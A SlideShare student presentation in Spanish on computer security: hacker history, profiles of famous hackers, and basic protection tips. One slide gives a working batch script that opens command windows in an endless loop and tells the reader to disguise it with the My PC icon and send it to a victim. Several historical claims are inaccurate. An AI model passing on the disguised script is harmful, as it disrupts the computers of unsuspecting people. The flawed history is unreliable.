SlideShare una empresa de Scribd logo
1 de 25
SEGURIDAD INFORMATICA DEIBY JOHAN CALDERON OROZCO GERSON PASCUAL RODAS OCHOA TECNICO EN SISTEMAS 180604 CENTRO DE DISEÑO E INNOVACION TECNOLOGICA INDUSTRIAL
SEGURIDAD INFORMATICA POR: DEIBY JOHAN CALDERON OROZCO GERSON PASCUAL RODAS OCHOA TECNICO EN SISTEMAS 180604 PRESENTADO A: ING. EDWIN ALEXANDER GOMEZ CENTRO DE DISEÑO E INNOVACION TECNOLOGICA INDUSTRIAL
SEGURIDAD INFORMÁTICA
Reseña histórica sobre hackers No era así como se llamaban a sí mismos. Tampoco "hackers" ni nada parecido; el sobrenombre "Auténtico Programador" (Real Programmer) no sería usado hasta el año 1980, en que uno de ellos lo hizo de forma retrospectiva. Desde 1945, las tecnologías de la computación habían atraído a muchos de los cerebros más brillantes y creativos del mundo
Aparicion en el mercado tecnologico Una comunidad de entusiastas programadores y diseñadores de sistemas originada en los sesenta alrededor del Instituto Tecnológico de Massachusetts (MIT), el TechModelRailroad Club (TMRC) y el Laboratorio de Inteligencia Artificial del MIT. La comunidad de aficionados a la informática doméstica, centrada en el hardware posterior a los setenta y en el software (juegos de ordenador, crackeo de software, la demoscene) de entre los ochenta/noventa.
Los 5 más destacados en el mundo White hat: Stephen Wozniak Tim Berners-Lee LinusTorvalds Richard Stallman TsutomuShimomura
Stephen Wozniak “Woz” es el co-fundador de Apple, él y Steve Jobs fueron los creadores de Apple Wozempezó a hackear haciendo cajas azules (blue boxes) las cuales lograban imitar los sonidos del teléfono de ésa época logrando así llamadas gratuitas de larga distancia
Tim Berners-Lee Sir Timothy “Tim” John Berners-Lee, KBE (TimBL o TBL) es el creador de la Word Wide Web (WWW) Mientras fué estudiante en la universidad de Oxford, hackeaba con precaución junto con un amigo, y luego fuébetado de las computadoras de la Universidad
Linustorvalds es el padre de Linux. Se llama a si mismo “un ingeniero”, y dice que aspira a algo simple Creó el kernel/GNU de Linux en 1991, usando un sistema operativo llamado Minix como inspiración
Richard stallman La fama de Stallman viene de la fundación del código abierto, es conocido como el padre del Software libre tiene su comienzo en hackeo en el MIT. Él trabajó como un “staff hacker” en el proyecto de Emacs, y en otros. El criticaba el acceso restringido a las computadoras en el laboratorio. Cuando un sistema de passwords era instalado, Stallman lo rompía, y reseteaba los passwords como cadenas nulas, o “nullstrings”, luego enviava a los usuarios mensajes informándoles que ya no había sistema de passwords.
Tsutomoshimomura físico experto en seguridad conocido por colaborar con John Markoff y ayudar al FBI a arrestar a Kevin Mitnick Sin embargo TsutomuShimomura fue antes un hacker del mundo oscuro, pues invadió el sistema de la AT&T
Los 5 mas destacados en el mundo Black hat: Jonathan james Adrian lamo Kevin mitnick Kevin poulsen Robert tappanmorris
Jonathan james Las más importantes intrusiones de James tuvieron como objetivo organizaciones de alto grado. Él instaló un backdoor en un servidor de la Agencia de Reducción de Amenazas de la Defensa (DefenseThreatReduction Agency – DRTA).Es una agencia del Departamento de Defensa encargado de reducir las amenazas a los Estados Unidos y sus aliados de armas nucleares, biológicas, químicas, convencionales y especiales. El backdoor que el creó le permitió ver emails de asuntos delicados y capturar los nombres de usuario (username) y clave (passwords) de los empleados.
Adiran lamo Lamo saltó a la fama por sus intrusiones a organizaciones mayores como The New York Times and Microsoft. Bajo el apodo de “homeless hacker” (hacker sin hogar), el usó conexiones como Kinko (internet cafés), tiendas café y librerías para hacer sus intrusiones. En un articulo de su perfil, Lamo reflexiona “Tengo una computadora portátil en Pittsburg, me cambio de ropas en Washington D.C., para dar una idea de mi juridiscionabilidad”
Kevin mitnick fue acusado de robo de software, fraude electrónico, daño a los ordenadores de la Universidad del Sur de California, robo de archivos e intercepción de mensajes de correo electrónico. Entre las compañías afectadas figuraban Nokia, Fujitsu, Nec, Novell, Sun Microsystems, Motorola, Apple…
Kevin poulson Tambien conocido como “Dark Dante”, Pulsen ganó reconocimiento cuando hackeó las lineastelefonicas de la radio de Los Angeles “KISS FM”, con lo cual obtuvo ganancias para comprarse un Porsche, entre otras cosas. Las fuerzas del orden lo apodaron “El HannibaLecter del crimen informatico”. Las autoridades comenzaron a perseguir a Poulsendespues que hackeara una base de datos de investigación federal
Robert tappanmorris Tappan Morris es hijo de un científico de la Agencia Nacional de Seguridad, y conocido como el creador del Gusano Morris, el primer gusano desencadenado en Internet. Morris escribió el código del gusano cuando era estudiante de CornellUniversity. Su intención era usarlo para ver que tan largo era Internet, pero el gusano se replicaba excesivamente, haciendo las computadoras demasiado lentas
Como atacan la seguridad de los equipos Normalmente este tipo de programas se pega a alguna entidad ejecutable que le facilitará la subida a memoria principal y la posterior ejecución (métodos de infección). Como entidades ejecutables podemos reconocer a los sectores de arranque de los discos de almacenamiento magnéticos, ópticos o magneto-ópticos (MBR, BR), los archivos ejecutables de DOSs (.exe, .com, entre otros), las librerías o módulos de programas (.dll, .lib, .ovl, .bin, .ovr). Los sectores de arranque son fundamentales para garantizar que el virus será cargado cada vez que se encienda la computadora.
Como protegerse de ataques de hackers  Nunca proporcionar datos personales a un correo electrónico o un mensaje de “emergente” mientras en línea. Esto se llama phishing cuando un ladrón intenta conseguir que le dan sus datos. Instalar un software de seguridad de confianza y eficiente en el equipo de casa. Esto evitará que virus infecte su equipo y el robo de datos importantes. Mantener el software actualizado.
Cómo descubrimos que estamos siendo atacados por un hacker Algunas de las formas de darse cuenta es cuando llegan muchos correos basura, o cuando llegan correos como del banco pidiendo contraseñas o peor cuando al revisar el ordenador se da uno cuenta que hay archivos corrompidos o que no estan y el computador tiene virus, que algunos no los detecta el antivirus.
Como operan los hackers Los hackers principal recurso dependen, además de su propio ingenio, es un código informático. Si bien existe una gran comunidad de hackers en Internet, sólo un número relativamente pequeño de hackers en realidad el código del programa. Muchos hackers buscar y descargar el código escrito por otras personas. Hay miles de diferentes programas de los hackers utilizan para explorar las computadoras y redes. Estos programas dan a los piratas una gran cantidad de poder sobre los usuarios inocentes y las organizaciones - una vez un hacker experto sabe cómo funciona un sistema, se pueden diseñar programas que se aprovechan de ella.
Programas Algunos de los programas que les facilitan son: Keyloggers:elprograma de registro de cada golpe de teclado, dando todo al hacker que tiene que infiltrarse en un sistema o incluso robar la identidad de alguien. virus: Los virus informáticos son programas diseñados para que se dupliquen y causar problemas que van desde estrellarse un equipo a exterminar a todo en el disco duro de un sistema
Qué programa sirve para proteger las memorias usb de los virus Normalmente al llevar una usb tipo pendrive, lo que se supone es que si un equipo esta infectado, la usbtambien quede infectada, en la mayoria de los casos, por lo que antes de abrirla pasarle un antivirus, pues estos no son preventivos sino correctivos.
Cómo  se crea un virus  1. Abre el bloc de notas 2. Escribe el siguiente código: @echo off :a start start start start start start goto :a 3. Vete a archivo -> guardar como: Mi PC.bat , esto es el nombre del archivo, lo puedes llamar como quieras pero que termine en .bat. En tipo has de seleccionar todos los archivos 4. Puedes cambiar el icono por otro que te guste, por ejemplo por el de Mi PC, de esta manera pasará desapercibido. 5. Ya se lo puedes enviar a tu victima. Es un virus inofensivo, lo que hace el script, es abrir CMD seis veces continuamente y no tienes manera de detenerlo, simplemente reinicia el ordenador y el problema estará solucionado. Lo podemos considerar un truco del bloc de notas.
Como se eliminan El software antivirus contrarresta de varias maneras los efectos de los virus informáticos para detectarlos. La mayoría de las soluciones se basan en tres componentes para la detección: exploración de acceso, exploración requerida, y suma de comprobación.

Más contenido relacionado

La actualidad más candente

La actualidad más candente (9)

Revista digital
Revista digitalRevista digital
Revista digital
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503
 
hackers
hackershackers
hackers
 
Hackers
HackersHackers
Hackers
 
Seguridad de informatica
Seguridad de informaticaSeguridad de informatica
Seguridad de informatica
 
Informatica virus
Informatica virusInformatica virus
Informatica virus
 
Virus informáticos
Virus informáticosVirus informáticos
Virus informáticos
 
Diferentes amenazas de seguridad informatica
Diferentes amenazas de seguridad informaticaDiferentes amenazas de seguridad informatica
Diferentes amenazas de seguridad informatica
 

Destacado

Solucion guia registro windows_180604
Solucion guia registro windows_180604Solucion guia registro windows_180604
Solucion guia registro windows_180604deibyctc180604
 
Nuevas tecnologías procesadores intel_180604
Nuevas tecnologías procesadores intel_180604Nuevas tecnologías procesadores intel_180604
Nuevas tecnologías procesadores intel_180604deibyctc180604
 
Comunicaciones con Alta Disponibilidad
Comunicaciones con Alta DisponibilidadComunicaciones con Alta Disponibilidad
Comunicaciones con Alta DisponibilidadÍñigo Ramos Barrio
 
Nuevas tecnologías procesadores intel_180604
Nuevas tecnologías procesadores intel_180604Nuevas tecnologías procesadores intel_180604
Nuevas tecnologías procesadores intel_180604deibyctc180604
 
Las Telecomunicaciones como Herramienta de Desarrollo e Inclusión Social
Las Telecomunicaciones como Herramienta de Desarrollo e Inclusión SocialLas Telecomunicaciones como Herramienta de Desarrollo e Inclusión Social
Las Telecomunicaciones como Herramienta de Desarrollo e Inclusión SocialFitelPeru
 
Banda Ancha para la Conectividad Integral y el Desarrollo Social de las Regiones
Banda Ancha para la Conectividad Integral y el Desarrollo Social de las RegionesBanda Ancha para la Conectividad Integral y el Desarrollo Social de las Regiones
Banda Ancha para la Conectividad Integral y el Desarrollo Social de las RegionesFitelPeru
 

Destacado (9)

Solucion guia registro windows_180604
Solucion guia registro windows_180604Solucion guia registro windows_180604
Solucion guia registro windows_180604
 
Nuevas tecnologías procesadores intel_180604
Nuevas tecnologías procesadores intel_180604Nuevas tecnologías procesadores intel_180604
Nuevas tecnologías procesadores intel_180604
 
Sistemas operativos
Sistemas operativosSistemas operativos
Sistemas operativos
 
Comunicaciones con Alta Disponibilidad
Comunicaciones con Alta DisponibilidadComunicaciones con Alta Disponibilidad
Comunicaciones con Alta Disponibilidad
 
Nuevas tecnologías procesadores intel_180604
Nuevas tecnologías procesadores intel_180604Nuevas tecnologías procesadores intel_180604
Nuevas tecnologías procesadores intel_180604
 
Fibra optica
Fibra opticaFibra optica
Fibra optica
 
Fibra optica
Fibra opticaFibra optica
Fibra optica
 
Las Telecomunicaciones como Herramienta de Desarrollo e Inclusión Social
Las Telecomunicaciones como Herramienta de Desarrollo e Inclusión SocialLas Telecomunicaciones como Herramienta de Desarrollo e Inclusión Social
Las Telecomunicaciones como Herramienta de Desarrollo e Inclusión Social
 
Banda Ancha para la Conectividad Integral y el Desarrollo Social de las Regiones
Banda Ancha para la Conectividad Integral y el Desarrollo Social de las RegionesBanda Ancha para la Conectividad Integral y el Desarrollo Social de las Regiones
Banda Ancha para la Conectividad Integral y el Desarrollo Social de las Regiones
 

Similar a Seguridad informática

Seguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correaSeguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correasebascorrea27
 
Seguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correaSeguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correasebascorrea27
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackerssalsa2012
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackerssalsa2012
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackerssalsa2011
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackerssalsa2012
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackerssalsa2012
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticanadia82
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticatatii2011
 
Reseña histórica de los hackers
Reseña histórica de los hackersReseña histórica de los hackers
Reseña histórica de los hackersvicuty2179
 
Reseña histórica de los hackers
Reseña histórica de los hackersReseña histórica de los hackers
Reseña histórica de los hackersvicuty2179
 
Seguridad Informatica Hackers
Seguridad Informatica HackersSeguridad Informatica Hackers
Seguridad Informatica Hackersvicuty2179
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503stefannyquiroga
 
Solución guia s.operativos_294503(1)
Solución  guia s.operativos_294503(1)Solución  guia s.operativos_294503(1)
Solución guia s.operativos_294503(1)luisa1200
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503haroldm2011
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503haroldm2011
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503haroldm2011
 

Similar a Seguridad informática (20)

Seguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correaSeguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correa
 
Seguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correaSeguridad informatica.ppt kevin alzate sebastian correa
Seguridad informatica.ppt kevin alzate sebastian correa
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackers
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackers
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackers
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackers
 
Seguridad informatica hackers
Seguridad informatica hackersSeguridad informatica hackers
Seguridad informatica hackers
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
 
S.oper 180604.pps[1]
S.oper 180604.pps[1]S.oper 180604.pps[1]
S.oper 180604.pps[1]
 
Reseña histórica de los hackers
Reseña histórica de los hackersReseña histórica de los hackers
Reseña histórica de los hackers
 
Reseña histórica de los hackers
Reseña histórica de los hackersReseña histórica de los hackers
Reseña histórica de los hackers
 
Seguridad Informatica Hackers
Seguridad Informatica HackersSeguridad Informatica Hackers
Seguridad Informatica Hackers
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503
 
Solución guia s.operativos_294503(1)
Solución  guia s.operativos_294503(1)Solución  guia s.operativos_294503(1)
Solución guia s.operativos_294503(1)
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503
 
Solución guia s.operativos_294503
Solución  guia s.operativos_294503Solución  guia s.operativos_294503
Solución guia s.operativos_294503
 

Último

La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...JonathanCovena1
 
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyzel CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyzprofefilete
 
la unidad de s sesion edussssssssssssssscacio fisca
la unidad de s sesion edussssssssssssssscacio fiscala unidad de s sesion edussssssssssssssscacio fisca
la unidad de s sesion edussssssssssssssscacio fiscaeliseo91
 
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdfSELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdfAngélica Soledad Vega Ramírez
 
Informatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos BásicosInformatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos BásicosCesarFernandez937857
 
Caja de herramientas de inteligencia artificial para la academia y la investi...
Caja de herramientas de inteligencia artificial para la academia y la investi...Caja de herramientas de inteligencia artificial para la academia y la investi...
Caja de herramientas de inteligencia artificial para la academia y la investi...Lourdes Feria
 
Planificacion Anual 2do Grado Educacion Primaria 2024 Ccesa007.pdf
Planificacion Anual 2do Grado Educacion Primaria   2024   Ccesa007.pdfPlanificacion Anual 2do Grado Educacion Primaria   2024   Ccesa007.pdf
Planificacion Anual 2do Grado Educacion Primaria 2024 Ccesa007.pdfDemetrio Ccesa Rayme
 
EXPANSIÓN ECONÓMICA DE OCCIDENTE LEÓN.pptx
EXPANSIÓN ECONÓMICA DE OCCIDENTE LEÓN.pptxEXPANSIÓN ECONÓMICA DE OCCIDENTE LEÓN.pptx
EXPANSIÓN ECONÓMICA DE OCCIDENTE LEÓN.pptxPryhaSalam
 
Lecciones 04 Esc. Sabática. Defendamos la verdad
Lecciones 04 Esc. Sabática. Defendamos la verdadLecciones 04 Esc. Sabática. Defendamos la verdad
Lecciones 04 Esc. Sabática. Defendamos la verdadAlejandrino Halire Ccahuana
 
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdfCurso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdfFrancisco158360
 
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURAFORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURAEl Fortí
 
Dinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes dDinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes dstEphaniiie
 
Neurociencias para Educadores NE24 Ccesa007.pdf
Neurociencias para Educadores  NE24  Ccesa007.pdfNeurociencias para Educadores  NE24  Ccesa007.pdf
Neurociencias para Educadores NE24 Ccesa007.pdfDemetrio Ccesa Rayme
 
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptxOLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptxjosetrinidadchavez
 
Planificacion Anual 4to Grado Educacion Primaria 2024 Ccesa007.pdf
Planificacion Anual 4to Grado Educacion Primaria   2024   Ccesa007.pdfPlanificacion Anual 4to Grado Educacion Primaria   2024   Ccesa007.pdf
Planificacion Anual 4to Grado Educacion Primaria 2024 Ccesa007.pdfDemetrio Ccesa Rayme
 
30-de-abril-plebiscito-1902_240420_104511.pdf
30-de-abril-plebiscito-1902_240420_104511.pdf30-de-abril-plebiscito-1902_240420_104511.pdf
30-de-abril-plebiscito-1902_240420_104511.pdfgimenanahuel
 
cortes de luz abril 2024 en la provincia de tungurahua
cortes de luz abril 2024 en la provincia de tungurahuacortes de luz abril 2024 en la provincia de tungurahua
cortes de luz abril 2024 en la provincia de tungurahuaDANNYISAACCARVAJALGA
 

Último (20)

La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...La empresa sostenible: Principales Características, Barreras para su Avance y...
La empresa sostenible: Principales Características, Barreras para su Avance y...
 
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyzel CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
el CTE 6 DOCENTES 2 2023-2024abcdefghijoklmnñopqrstuvwxyz
 
la unidad de s sesion edussssssssssssssscacio fisca
la unidad de s sesion edussssssssssssssscacio fiscala unidad de s sesion edussssssssssssssscacio fisca
la unidad de s sesion edussssssssssssssscacio fisca
 
Power Point: Fe contra todo pronóstico.pptx
Power Point: Fe contra todo pronóstico.pptxPower Point: Fe contra todo pronóstico.pptx
Power Point: Fe contra todo pronóstico.pptx
 
Fe contra todo pronóstico. La fe es confianza.
Fe contra todo pronóstico. La fe es confianza.Fe contra todo pronóstico. La fe es confianza.
Fe contra todo pronóstico. La fe es confianza.
 
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdfSELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
SELECCIÓN DE LA MUESTRA Y MUESTREO EN INVESTIGACIÓN CUALITATIVA.pdf
 
Informatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos BásicosInformatica Generalidades - Conceptos Básicos
Informatica Generalidades - Conceptos Básicos
 
Caja de herramientas de inteligencia artificial para la academia y la investi...
Caja de herramientas de inteligencia artificial para la academia y la investi...Caja de herramientas de inteligencia artificial para la academia y la investi...
Caja de herramientas de inteligencia artificial para la academia y la investi...
 
Planificacion Anual 2do Grado Educacion Primaria 2024 Ccesa007.pdf
Planificacion Anual 2do Grado Educacion Primaria   2024   Ccesa007.pdfPlanificacion Anual 2do Grado Educacion Primaria   2024   Ccesa007.pdf
Planificacion Anual 2do Grado Educacion Primaria 2024 Ccesa007.pdf
 
EXPANSIÓN ECONÓMICA DE OCCIDENTE LEÓN.pptx
EXPANSIÓN ECONÓMICA DE OCCIDENTE LEÓN.pptxEXPANSIÓN ECONÓMICA DE OCCIDENTE LEÓN.pptx
EXPANSIÓN ECONÓMICA DE OCCIDENTE LEÓN.pptx
 
Lecciones 04 Esc. Sabática. Defendamos la verdad
Lecciones 04 Esc. Sabática. Defendamos la verdadLecciones 04 Esc. Sabática. Defendamos la verdad
Lecciones 04 Esc. Sabática. Defendamos la verdad
 
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdfCurso = Metodos Tecnicas y Modelos de Enseñanza.pdf
Curso = Metodos Tecnicas y Modelos de Enseñanza.pdf
 
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURAFORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
 
Dinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes dDinámica florecillas a María en el mes d
Dinámica florecillas a María en el mes d
 
Neurociencias para Educadores NE24 Ccesa007.pdf
Neurociencias para Educadores  NE24  Ccesa007.pdfNeurociencias para Educadores  NE24  Ccesa007.pdf
Neurociencias para Educadores NE24 Ccesa007.pdf
 
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptxOLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
OLIMPIADA DEL CONOCIMIENTO INFANTIL 2024.pptx
 
Planificacion Anual 4to Grado Educacion Primaria 2024 Ccesa007.pdf
Planificacion Anual 4to Grado Educacion Primaria   2024   Ccesa007.pdfPlanificacion Anual 4to Grado Educacion Primaria   2024   Ccesa007.pdf
Planificacion Anual 4to Grado Educacion Primaria 2024 Ccesa007.pdf
 
Unidad 3 | Metodología de la Investigación
Unidad 3 | Metodología de la InvestigaciónUnidad 3 | Metodología de la Investigación
Unidad 3 | Metodología de la Investigación
 
30-de-abril-plebiscito-1902_240420_104511.pdf
30-de-abril-plebiscito-1902_240420_104511.pdf30-de-abril-plebiscito-1902_240420_104511.pdf
30-de-abril-plebiscito-1902_240420_104511.pdf
 
cortes de luz abril 2024 en la provincia de tungurahua
cortes de luz abril 2024 en la provincia de tungurahuacortes de luz abril 2024 en la provincia de tungurahua
cortes de luz abril 2024 en la provincia de tungurahua
 

Seguridad informática

  • 1. SEGURIDAD INFORMATICA DEIBY JOHAN CALDERON OROZCO GERSON PASCUAL RODAS OCHOA TECNICO EN SISTEMAS 180604 CENTRO DE DISEÑO E INNOVACION TECNOLOGICA INDUSTRIAL
  • 2. SEGURIDAD INFORMATICA POR: DEIBY JOHAN CALDERON OROZCO GERSON PASCUAL RODAS OCHOA TECNICO EN SISTEMAS 180604 PRESENTADO A: ING. EDWIN ALEXANDER GOMEZ CENTRO DE DISEÑO E INNOVACION TECNOLOGICA INDUSTRIAL
  • 4. Reseña histórica sobre hackers No era así como se llamaban a sí mismos. Tampoco "hackers" ni nada parecido; el sobrenombre "Auténtico Programador" (Real Programmer) no sería usado hasta el año 1980, en que uno de ellos lo hizo de forma retrospectiva. Desde 1945, las tecnologías de la computación habían atraído a muchos de los cerebros más brillantes y creativos del mundo
  • 5. Aparicion en el mercado tecnologico Una comunidad de entusiastas programadores y diseñadores de sistemas originada en los sesenta alrededor del Instituto Tecnológico de Massachusetts (MIT), el TechModelRailroad Club (TMRC) y el Laboratorio de Inteligencia Artificial del MIT. La comunidad de aficionados a la informática doméstica, centrada en el hardware posterior a los setenta y en el software (juegos de ordenador, crackeo de software, la demoscene) de entre los ochenta/noventa.
  • 6. Los 5 más destacados en el mundo White hat: Stephen Wozniak Tim Berners-Lee LinusTorvalds Richard Stallman TsutomuShimomura
  • 7. Stephen Wozniak “Woz” es el co-fundador de Apple, él y Steve Jobs fueron los creadores de Apple Wozempezó a hackear haciendo cajas azules (blue boxes) las cuales lograban imitar los sonidos del teléfono de ésa época logrando así llamadas gratuitas de larga distancia
  • 8. Tim Berners-Lee Sir Timothy “Tim” John Berners-Lee, KBE (TimBL o TBL) es el creador de la Word Wide Web (WWW) Mientras fué estudiante en la universidad de Oxford, hackeaba con precaución junto con un amigo, y luego fuébetado de las computadoras de la Universidad
  • 9. Linustorvalds es el padre de Linux. Se llama a si mismo “un ingeniero”, y dice que aspira a algo simple Creó el kernel/GNU de Linux en 1991, usando un sistema operativo llamado Minix como inspiración
  • 10. Richard stallman La fama de Stallman viene de la fundación del código abierto, es conocido como el padre del Software libre tiene su comienzo en hackeo en el MIT. Él trabajó como un “staff hacker” en el proyecto de Emacs, y en otros. El criticaba el acceso restringido a las computadoras en el laboratorio. Cuando un sistema de passwords era instalado, Stallman lo rompía, y reseteaba los passwords como cadenas nulas, o “nullstrings”, luego enviava a los usuarios mensajes informándoles que ya no había sistema de passwords.
  • 11. Tsutomoshimomura físico experto en seguridad conocido por colaborar con John Markoff y ayudar al FBI a arrestar a Kevin Mitnick Sin embargo TsutomuShimomura fue antes un hacker del mundo oscuro, pues invadió el sistema de la AT&T
  • 12. Los 5 mas destacados en el mundo Black hat: Jonathan james Adrian lamo Kevin mitnick Kevin poulsen Robert tappanmorris
  • 13. Jonathan james Las más importantes intrusiones de James tuvieron como objetivo organizaciones de alto grado. Él instaló un backdoor en un servidor de la Agencia de Reducción de Amenazas de la Defensa (DefenseThreatReduction Agency – DRTA).Es una agencia del Departamento de Defensa encargado de reducir las amenazas a los Estados Unidos y sus aliados de armas nucleares, biológicas, químicas, convencionales y especiales. El backdoor que el creó le permitió ver emails de asuntos delicados y capturar los nombres de usuario (username) y clave (passwords) de los empleados.
  • 14. Adiran lamo Lamo saltó a la fama por sus intrusiones a organizaciones mayores como The New York Times and Microsoft. Bajo el apodo de “homeless hacker” (hacker sin hogar), el usó conexiones como Kinko (internet cafés), tiendas café y librerías para hacer sus intrusiones. En un articulo de su perfil, Lamo reflexiona “Tengo una computadora portátil en Pittsburg, me cambio de ropas en Washington D.C., para dar una idea de mi juridiscionabilidad”
  • 15. Kevin mitnick fue acusado de robo de software, fraude electrónico, daño a los ordenadores de la Universidad del Sur de California, robo de archivos e intercepción de mensajes de correo electrónico. Entre las compañías afectadas figuraban Nokia, Fujitsu, Nec, Novell, Sun Microsystems, Motorola, Apple…
  • 16. Kevin poulson Tambien conocido como “Dark Dante”, Pulsen ganó reconocimiento cuando hackeó las lineastelefonicas de la radio de Los Angeles “KISS FM”, con lo cual obtuvo ganancias para comprarse un Porsche, entre otras cosas. Las fuerzas del orden lo apodaron “El HannibaLecter del crimen informatico”. Las autoridades comenzaron a perseguir a Poulsendespues que hackeara una base de datos de investigación federal
  • 17. Robert tappanmorris Tappan Morris es hijo de un científico de la Agencia Nacional de Seguridad, y conocido como el creador del Gusano Morris, el primer gusano desencadenado en Internet. Morris escribió el código del gusano cuando era estudiante de CornellUniversity. Su intención era usarlo para ver que tan largo era Internet, pero el gusano se replicaba excesivamente, haciendo las computadoras demasiado lentas
  • 18. Como atacan la seguridad de los equipos Normalmente este tipo de programas se pega a alguna entidad ejecutable que le facilitará la subida a memoria principal y la posterior ejecución (métodos de infección). Como entidades ejecutables podemos reconocer a los sectores de arranque de los discos de almacenamiento magnéticos, ópticos o magneto-ópticos (MBR, BR), los archivos ejecutables de DOSs (.exe, .com, entre otros), las librerías o módulos de programas (.dll, .lib, .ovl, .bin, .ovr). Los sectores de arranque son fundamentales para garantizar que el virus será cargado cada vez que se encienda la computadora.
